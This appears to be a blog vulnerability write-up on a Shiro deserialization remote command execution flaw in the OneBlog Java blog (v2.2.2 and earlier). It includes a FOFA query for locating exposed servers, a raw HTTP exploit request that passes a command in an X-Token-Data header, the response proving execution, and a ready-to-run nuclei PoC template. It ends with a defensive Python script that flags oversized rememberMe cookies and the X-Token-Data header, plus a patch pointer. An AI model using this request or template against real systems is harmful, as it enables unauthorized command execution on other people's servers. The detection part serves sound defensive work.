OneBlog blog Shiro deserialization remote command execution vulnerability
Disclaimer: this article is a shared study note intended only as a technical learning reference. Do not use it for illegal purposes. Any direct or indirect consequences or losses caused by an individual or organization using the information provided here are the sole responsibility of that user and have nothing to do with this platform or the publisher!!!
Vulnerability name
OneBlog blog Shiro deserialization remote command execution vulnerability
Affected products
OneBlog blog
Vulnerability description
OneBlog is a clean, good-looking, feature-rich and responsive Java blog. OneBlog v2.2.2 and earlier contain a Shiro deserialization vulnerability; an attacker can execute arbitrary commands on the affected system and thereby gain unauthorized access to it.
FOFA search query
body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
Vulnerability reproduction
Send the following request to the test target; it executes the command echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=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
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
The response is as follows (the HTML body is truncated here)
HTTP/1.1 200
Connection: close
Transfer-Encoding: chunked
Date: Tue, 26 Dec 2023 06:50:11 GMT
2a4MU6FVYI3qR4AWxn1Bdfh6Ttk
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>博客后台管理系统</title>
<link href="/assets/images/favicon.ico" rel="icon">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<link href="https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="https://cdn.jsdelivr.net/npm/jquery-confirm@3.3.2/dist/jquery-confirm.min.css" rel="stylesheet">
<link href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" rel="stylesheet">
<link href="/assets/css/zhyd.core.css" rel="stylesheet">
</head>
<body class="login">
<div class="modal fade" id="modal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" data-backdrop="static"
data-keyboard="false">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-body">
<div class="login_wrapper">
<div class="animate form login_form" style="position: relative;">
<section class="login_content">
<form action="/passport/signin" method="POST" id="login-form">
<h1>登录管理系统</h1>
<div>
<input type="text" class="form-control" placeholder="请输入用户名" name="username" required=""/>
Vulnerability reproduced successfully
nuclei PoC
The PoC file content is as follows
id: oneblog-login-rce
info:
  name: OneBlog博客Shiro反序列化远程命令执行漏洞
  author: fgz
  severity: critical
  description: OneBlog是一个简洁美观、功能强大并且自适应的Java博客。OneBlog v2.2.2 及之前的版本存在shiro反序列化漏洞,攻击者可以通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。
  metadata:
    max-request: 1
    fofa-query: body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
    verified: true
requests:
  - raw:
      - |+
        GET /passport/login/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Cookie: rememberMe=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
        X-Token-Data: echo "{{randstr}}"
        Accept-Encoding: gzip
        Connection: close
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, '{{randstr}}')"
Run the PoC
nuclei.exe -t mypoc/其他/oneblog-login-rce.yaml -u http://192.168.40.130:8085
Remediation
Watch the official project channel for a patch:
https://gitee.com/yadong.zhang/DBlog
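Until a patch is available, the traffic pattern shown in the reproduction above can be flagged at a reverse proxy or in request logs. The script below is an added defensive example written for this note; it is not part of the original write-up and is not OneBlog or Shiro project code. It inspects request records for three signals: a rememberMe cookie far larger than a genuine Shiro remember-me token, a rememberMe value that is not valid base64, and the presence of the X-Token-Data header that the PoC uses to carry the command. The size threshold, the sample records and the record field names are assumptions to tune against your own baseline.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Assumed threshold: a genuine Shiro rememberMe cookie is AES-encrypted
# serialized principal data and is normally a few hundred bytes. Tune this
# against the cookie sizes seen in your own legitimate traffic.
MAX_REMEMBER_ME_LEN = 2048

# Header the PoC in this note uses to pass the command to execute.
SUSPICIOUS_HEADERS = {"x-token-data"}

COOKIE_RE = re.compile(r"(?:^|;\s*)rememberMe=([^;]*)")

# Constructed sample request records (not real traffic). The first is a
# normal-sized remember-me cookie, the second mirrors the shape of the
# request in the write-up, the third is the cookie Shiro sets on logout.
SAMPLE_REQUESTS = [
    {
        "path": "/passport/login/",
        "headers": {"Cookie": "rememberMe=" + base64.b64encode(b"\x00" * 160).decode()},
    },
    {
        "path": "/passport/login/",
        "headers": {
            "Cookie": "rememberMe=" + base64.b64encode(b"A" * 6000).decode(),
            "X-Token-Data": 'echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"',
        },
    },
    {
        "path": "/passport/login/",
        "headers": {"Cookie": "rememberMe=deleteMe; JSESSIONID=abc"},
    },
]


@dataclass
class Finding:
    path: str
    reasons: list


def remember_me_value(cookie_header):
    """Return the rememberMe cookie value from a Cookie header, or None."""
    match = COOKIE_RE.search(cookie_header or "")
    return match.group(1) if match else None


def inspect_request(req):
    """Return a Finding for a suspicious request record, else None."""
    reasons = []
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    value = remember_me_value(headers.get("cookie"))

    # "deleteMe" is the value Shiro writes to clear the cookie; ignore it.
    if value and value != "deleteMe":
        if len(value) > MAX_REMEMBER_ME_LEN:
            reasons.append(
                f"rememberMe cookie is {len(value)} bytes "
                f"(threshold {MAX_REMEMBER_ME_LEN})"
            )
        try:
            base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            reasons.append("rememberMe cookie is not valid base64")

    for name in SUSPICIOUS_HEADERS & headers.keys():
        reasons.append(f"unexpected header {name} present")

    return Finding(req.get("path", ""), reasons) if reasons else None


def scan(requests):
    """Run inspect_request over a list of records and keep the findings."""
    return [f for f in map(inspect_request, requests) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding.path, "->", "; ".join(finding.reasons))
```

In practice the records would come from a proxy or WAF log; the oversized-cookie check alone is enough to surface most deserialization attempts against Shiro's remember-me feature, while the header check is specific to the PoC above and should be adjusted if your own investigation shows a different delivery channel.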
This is an original article, licensed under CC BY-NC-ND 4.0; when reposting it in full, please credit 程序员小航.